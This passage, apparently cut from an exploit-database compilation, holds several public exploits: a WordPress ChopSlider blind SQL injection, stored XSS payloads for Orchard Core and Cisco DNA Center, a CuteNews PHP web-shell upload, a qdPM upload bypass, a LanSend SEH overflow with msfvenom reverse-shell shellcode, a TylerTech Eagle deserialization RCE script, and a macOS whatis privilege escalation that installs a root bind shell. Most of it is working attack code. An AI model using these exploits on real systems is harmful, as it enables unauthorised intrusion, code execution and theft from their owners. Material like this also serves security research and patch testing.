        r = requests.post(ConnectUrl, data=PostData, headers='')
        end = time.time()
        if((end - start) >= wait_delay):
            break


def brute_panel(url):
    """Drive the full recovery: encrypt the knock string, then rows 1 and 2."""
    global KnockString, PostData
    # 'aaaa' is both the RC4 key and a 4-byte prefix of the request body.
    PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')
    print"Username: ",; sys.stdout.flush()
    ulen = brute_length(url, 1)
    for i in range(1, ulen+1):
        brute_char(url, i, 1)
    print"\nPassword: ",
    sys.stdout.flush()
    plen = brute_length(url, 2)
    for i in range(1, plen+1):
        brute_char(url, i, 2)
    print""


# Entry point: the single argument is the panel gate URL.
if(len(sys.argv) >= 2):
    brute_panel(sys.argv[1])
else:
    print("enter panel gate url")
-
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection
# Exploit Title: ChopSlider3 Wordpress Plugin 3.4 - 'id' SQL Injection # Exploit Author: SunCSR (Sun* Cyber Security Research) # Google Dork: N/A # Date: 2020-05-12 # Vendor Homepage: https://idangero.us/ # Software Link: https://github.com/idangerous/Plugins # Version: <= 3.4 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-11530 Description: A blind SQL injection vulnerability is present in Chop Slider 3 '/wp-content/plugins/chopslider/get_script/index.php': the `id` request parameter is concatenated directly into the query, without quoting, escaping or $wpdb->prepare(): $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id); PoC: Blind SQL injection: GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868 Using sqlmap: sqlmap -u ' http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3 sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-3097 OR 2236=2236 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1111111111 OR SLEEP(5) --- [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12
-
Orchard Core RC1 - Persistent Cross-Site Scripting
# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting # Google Dork: "Orchardcms" # Date: 2020-05-07 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: http://www.orchardcore.net/ # Software Link: https://github.com/OrchardCMS/OrchardCore # Version: RC1 # Tested on: Windows # CVE : N/A ### Vulnerability : Persistent Cross-Site Scripting ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML via create or edit blog content. ###To Reproduce Steps to reproduce the behavior: POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1 -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="ListPart.ContainerId" 4s5x3fv3qpsh7rwzvy069ykbxn -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="TitlePart.Title" Test XSS -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="AutoroutePart.Path" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="BlogPost.Subtitle.Text" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="MarkdownBodyPart.Source" <script>alert(document.cookie)</script> -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="submit.Publish" submit.Publish -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="__RequestVerificationToken" xxx -----------------------------31063090348194141451329743365-- ###Reference: https://github.com/OrchardCMS/OrchardCore/issues/5802 ### History ============= 2020-03-23 Issue discovered 2020-03-27 Vendor contacted 2020-04-22 Vendor response and hotfix 2020-04-22 Vendor set patch milestone to rc2
-
Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting
# Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting # Date: 2020-04-16 # Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France # Vendor Homepage: https://www.cisco.com/c/en/us/products/cloud-systems-management/dna-center/index.html # Version: Cisco DNA before 1.3.0.6 and 1.3.1.4 # Tested on: 1.3.0.2 # CVE : CVE-2019-15253 # Security advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190205-dnac-xss ## 1 - Network Hierarchy - Vulnerable parameter: Floor Name. - Payload: ```<script>alert('XSS')</script>``` - Details: There is no input validation or output encoding on this field; special characters are neither encoded nor filtered. - Privileges: Requires an admin or customer account. - Location: Design -> Network Hierarchy -> Building -> Floor -> Field: "Floor name". ## 2 - User Management - Vulnerable parameters: First Name, Last Name. - Payload: ```<script>alert('XSS')</script>``` - Details: There is no input validation or output encoding on these fields; special characters are neither encoded nor filtered. - Privileges: Requires an admin account. - Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".
-
CuteNews 2.1.2 - Authenticated Arbitrary File Upload
# Exploit Title: CuteNews 2.1.2 - Authenticated Arbitrary File Upload # Date: 2020-05-12 # Author: Vigov5 - SunCSR Team # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 # Tested on: Ubuntu 18.04 / Kali Linux Description: ------------------------------------------------------------------------ In the "Media Manager" area, Users with low privileges (Editor) can bypass file upload restrictions, resulting in arbitrary command execution. [PoC] -------------------------------------------------------------------------------- # Step 1. Create shell $ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.png; # Step 2. Upload Shell (# Minimum editor privileges) POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------15868731501112834542363527723 Content-Length: 3775 Origin: [target] DNT: 1 Connection: close Referer: [target]/CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="mod" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="opt" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="folder" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="CKEditorFuncNum" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="callback" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="style" 
-----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="faddm" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="imgopts" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_key" 7ffa4c94a150c20f0c1b51036f6e4597-editor -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_dsi" 48d87ded04d15407f258c57efa3216e8 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_from_inet" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_file[]"; filename="shell.png" Content-Type: image/png [Content Image Here ! ] -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload" Upload file(s) -----------------------------15868731501112834542363527723-- # Step 3. Change filename shell.jpg to shell.php POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: [target] DNT: 1 Connection: close Referer: http://[target]CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=ebdaf403dcda492fabe8f1d96399b16b-editor&__signature_dsi=27a9035f2b130dd1477ad2a37a5721da&pending=rename&ids%5B0%5D=shell.png&place%5B0%5D=shell.php # Step 4. Execute the command with the path : http:// [target]/CuteNews/uploads/shell.php?cmd=id
-
qdPM 9.1 - Arbitrary File Upload
# Exploit Title: qdPM 9.1 - Arbitrary File Upload # Date: 2020-05-06 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/qdpm/ # Software Link: https://sourceforge.net/projects/qdpm/ # Version: v9.1 (may affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description -------------------------------------------------------------------- When a normal user updates their profile, they can upload arbitrary files through the user_photo field, because the upload performs no file-extension check. The .htaccess file in the upload folder does block .php files, but its FilesMatch pattern appears to be case-sensitive (there is no `(?i)` flag), so an attacker can upload the file with an uppercase .PHP extension and run code on the server. .htaccess file content: ---------------------------------------------- # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Vulnerable File-1: actions.class.php ---------------------------------------------- Vulnerable function: processForm --------------------------------------------- Vulnerable area: --------------------------------------------- <?php protected function processForm(sfWebRequest $request, sfForm $form) { $files = $request->getFiles(); $userPhoto = $files['users']['photo']['name']; $form->bind($request->getParameter($form->getName()), $request->getFiles($form->getName())); if ($form->isValid()) { $user = $this->getUser()->getAttribute('user'); $this->checkUser($form['email']->getValue(),$user->getId()); $form->setFieldValue('users_group_id',$user->getUsersGroupId()); $form->setFieldValue('active',$user->getActive()); $hasher = new PasswordHash(11, false); if(isset($form['new_password'])) { if(strlen($form['new_password']->getValue())>0) { $form->setFieldValue('password', 
$hasher->HashPassword($form['new_password']->getValue())); } } if(strlen($userPhoto)>0) { $userPhoto = rand(111111,999999) . '-' . $userPhoto; $filename = sfConfig::get('sf_upload_dir') . '/users/' . $userPhoto; move_uploaded_file($files['users']['photo']['tmp_name'], $filename); $form->setFieldValue('photo', $userPhoto); app::image_resize($filename,$filename); } else { $form->setFieldValue('photo', $form['photo_preview']->getValue()); } ?>
-
LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86
#
# Python 2 script: it uses the py2 builtin file() and concatenates str
# ('\x90', 'A') with the b"" shellcode, which only works when both are the
# py2 str type.  Under Python 3 it fails on file() and then on str/bytes
# mixing.

f = file('payload.txt','w')  # output file whose content is pasted into the application (see PoC below)
""" PoC 1. Run exploit 2. Run Lansend and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """
""" msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """
# Encoded reverse-shell payload exactly as emitted by the msfvenom command
# quoted above (bad chars \x00 \x0a \x0d excluded by the encoder).
shellcode = b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
""" 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """
# Stub matching the disassembly quoted above: pop ecx; pop ecx; add cl,0x64;
# jmp ecx.  Presumably redirects execution into the sled/shellcode; the
# exact offsets cannot be verified from this listing.
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
"""ppr 00417a47"""
# Layout: 30-byte NOP sled | shellcode | jmp stub | 12 bytes filler |
# nSEH = \xeb\xeb\x90\x90 (short jmp, \xeb = JMP rel8) | SEH handler =
# 0x00417a47 (pop/pop/ret per the note above) written as its 3 low bytes;
# the leading null byte is not emitted.  Mitigation note: a pop/pop/ret
# inside the application's own image at 0x0041xxxx is only usable when that
# module lacks SafeSEH/ASLR -- inferred, not verified here.
payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41'
f.write(payload)
f.close()
-
TylerTech Eagle 2018.3.11 - Remote Code Execution
# Exploit Title: TylerTech Eagle 2018.3.11 - Remote Code Execution
# Date: 2019-10-08
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.tylertech.com/products/eagle
# Version: 2018.3.11
# Tested on: Windows 2012
# CVE: CVE-2019-16112
# Category: webapps
#
# Eagle is software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution.
# /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application.
#
# NOTE: Python 2 script (`urlparse` is the Python 2 module name; it is
# `urllib.parse` in Python 3). `requests` is a third-party dependency.
#
# Defender note: the request below is a POST of a zlib-compressed Java
# serialized object to /recorder/ServiceManager. The class-level fix is to
# not deserialize client-supplied bytes at all, or to enforce a
# deserialization allow-list (JEP 290 ObjectInputFilter) and remove the
# gadget-bearing library the payload targets (Commons Collections). For
# detection, inflate octet-stream POST bodies to that path and look for the
# Java serialization stream header.

import sys, requests, zlib, argparse, urlparse, subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# verify=False is used below, so the TLS warning is silenced globally.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def run_command(command):
    """Run `command` through the shell and return its combined stdout/stderr as bytes.

    Uses shell=True with a pre-built string, so the caller is responsible for
    quoting; blocks until the child closes its stdout (EOF), but does not wait
    on or check the exit status, so a failing child yields whatever it printed.
    """
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
    output = b''
    for line in iter(p.stdout.readline, b''):
        output += line
    return output

def isurl(urlstr):
    """argparse type: return `urlstr` unchanged if urlparse accepts it.

    urlparse.urlparse() accepts almost any string without raising, so this is
    a very weak check; the bare `except` also masks unrelated errors.
    """
    try:
        urlparse.urlparse(urlstr)
        return urlstr
    except:
        raise argparse.ArgumentTypeError("invalid url")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Java Deserialization Exlpoit')
    parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
    parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
    parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.jar")
    parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
    args = parser.parse_args()

    # Only scheme and host of --url are kept; any path given is discarded and
    # the fixed endpoint path is appended further down.
    url_parts = urlparse.urlparse(args.url)
    target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)

    # Optional proxy, keyed by its own scheme (so an http:// proxy is used
    # only for http:// targets, and likewise for https://).
    proxies = {}
    if(args.proxy != None):
        proxy_parts = urlparse.urlparse(args.proxy)
        proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)

    # `cmd` is assigned but never used; run_command() reads args.cmd directly.
    # The command is interpolated inside double quotes of a shell string on the
    # operator's own machine, so a `"` in --cmd breaks the quoting there.
    cmd = args.cmd
    serial_payload = run_command('java -jar %s CommonsCollections6 "%s"' % (args.ysoserial, args.cmd))

    url = target_url + "/recorder/ServiceManager?service=tyler.empire.settings.SettingManager"
    # NOTE: `headers` is built but never passed to requests.post below, so the
    # request is sent with requests' default Content-Type, not octet-stream.
    headers = {'Content-Type': 'application/octet-stream'}
    # The endpoint expects the serialized object zlib-compressed.
    payload = zlib.compress(serial_payload)
    # Response is not inspected; TLS verification is disabled.
    response = requests.post(url, data=payload, proxies=proxies, verify=False)
-
MacOS 320.whatis Script - Privilege Escalation
# Exploit Title: MacOS 320.whatis Script - Privilege Escalation
# Date: 2020-05-06
# Exploit Author: Csaba Fitzl
# Vendor Homepage: https://support.apple.com/en-us/HT210722
# Version: macOS < 10.15.1
# Tested on: macOS
# CVE : CVE-2019-8802
#
# NOTE: Python 2 script (print statements without parentheses in main()).
#
# Mechanism, as far as this file shows it: a man page is dropped under
# /usr/local/share/man, a symlink named whatis.tmp in that directory points at
# a LaunchDaemon plist, and the root-run periodic task that rebuilds the
# whatis database (320.whatis, per the title) is expected to follow the
# symlink and write the generated index -- which contains the crafted man
# page's NAME line -- over the plist. The man page's file name begins with
# `<!--` and its NAME line starts with `-->` and ends with `<!--`, so that
# everything in the index line outside the embedded plist becomes XML
# comment and the plist parses cleanly.
#
# Defender note: the observable artifacts are a symlink at
# /usr/local/share/man/whatis.tmp, a new /Library/LaunchDaemons plist
# (com.sample.Load) pointing at /Applications/Scripts/sample.sh, renamed
# numeric-prefixed man pages, and (reboot mode) a listener on TCP 31337.
# The vendor page above states the fix version.

import sys
import os

# roff man page whose NAME line carries a LaunchDaemon plist wrapped in
# XML-comment delimiters (see the header comment).
man_file_content = """
.TH exploit 1 "August 16 2019" "Csaba Fitzl"
.SH NAME
exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!--
"""

# "quick" mode: the daemon just launches Terminal.
sh_quick_content = """
/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
"""

# "reboot" mode: the daemon runs the bind-shell script written below.
sh_reboot_content = """
python /Applications/Scripts/bind.py
"""

# Contents of /Applications/Scripts/bind.py (written as-is, not executed
# here): a Python 2 TCP bind shell on port 31337 that dup2()s the accepted
# socket over stdin/stdout/stderr and spawns /bin/bash in a pty.
python_bind_content = """
#!/usr/bin/python2
import os
import pty
import socket

lport = 31337

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()

if __name__ == "__main__":
    main()
"""

def create_man_file():
    """Write man_file_content to /usr/local/share/man/man1/<!--exploit.1.

    The `<!--` prefix in the file name is deliberate (see header comment).
    Assumes /usr/local/share/man/man1 exists and is writable by the
    current user; open() raises otherwise.
    """
    print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1")
    f = open('/usr/local/share/man/man1/<!--exploit.1','w')
    f.write(man_file_content)
    f.close()

def create_symlink():
    """Create /usr/local/share/man/whatis.tmp as a symlink to the target plist.

    Uses os.system('ln -s ...'); the exit status is not checked, so an
    existing whatis.tmp silently leaves the old link in place.
    """
    print("[i] Creating symlink in /usr/local/share/man/")
    os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp')

def create_scripts_dir():
    """Create /Applications/Scripts via `mkdir` (not -p; errors are ignored)."""
    print("[i] Creating /Applications/Scripts directory")
    os.system('mkdir /Applications/Scripts')

def create_quick_scripts():
    """Write sample.sh with the "quick" payload and mark it executable."""
    create_scripts_dir()
    print("[i] Creating script file to be called by LaunchDaemon")
    f = open('/Applications/Scripts/sample.sh','w')
    f.write(sh_quick_content)
    f.close()
    os.system('chmod +x /Applications/Scripts/sample.sh')

def create_reboot_scripts():
    """Write sample.sh with the "reboot" payload plus bind.py alongside it."""
    create_scripts_dir()
    print("[i] Creating script file to be called by LaunchDaemon")
    f = open('/Applications/Scripts/sample.sh','w')
    f.write(sh_reboot_content)
    f.close()
    os.system('chmod +x /Applications/Scripts/sample.sh')
    print("[i] Creating python script for bind shell")
    f = open('/Applications/Scripts/bind.py','w')
    f.write(python_bind_content)
    f.close()

def rename_man_pages():
    """Prefix every file under /usr/local/share/man whose name starts with a digit with 'a'.

    Presumably this keeps digit-named pages from sorting ahead of the crafted
    page in the generated index -- the file does not say; confirm against the
    whatis script. Note the log line prints the old name after the rename.
    Shadows the `file` builtin in the loop variable (harmless here).
    """
    for root, dirs, files in os.walk("/usr/local/share/man"):
        for file in files:
            if file[0] in "0123456789": #if filename begins with a number
                old_file = os.path.join(root, file)
                new_file = os.path.join(root, 'a' + file)
                os.rename(old_file, new_file) #rename with adding a prefix
                print("[i] Renaming: " + os.path.join(root, file))

def main():
    """Dispatch on argv[1]: 'quick' or 'reboot'; anything else prints usage.

    Both modes perform the same four steps (man page, symlink, scripts,
    renames) and differ only in which sample.sh is written. Note that the
    usage error exits with status 1 but the 'invalid arguments' branch
    returns normally (status 0).
    """
    if len(sys.argv) != 2 :
        print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
        sys.exit (1)
    if sys.argv[1] == 'quick':
        create_man_file()
        create_symlink()
        create_quick_scripts()
        rename_man_pages()
        print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
    elif sys.argv[1] == 'reboot':
        create_man_file()
        create_symlink()
        create_reboot_scripts()
        rename_man_pages()
        print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"
    else:
        print "[-] Invalid arguments"
        print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"

if __name__== "__main__":
    main()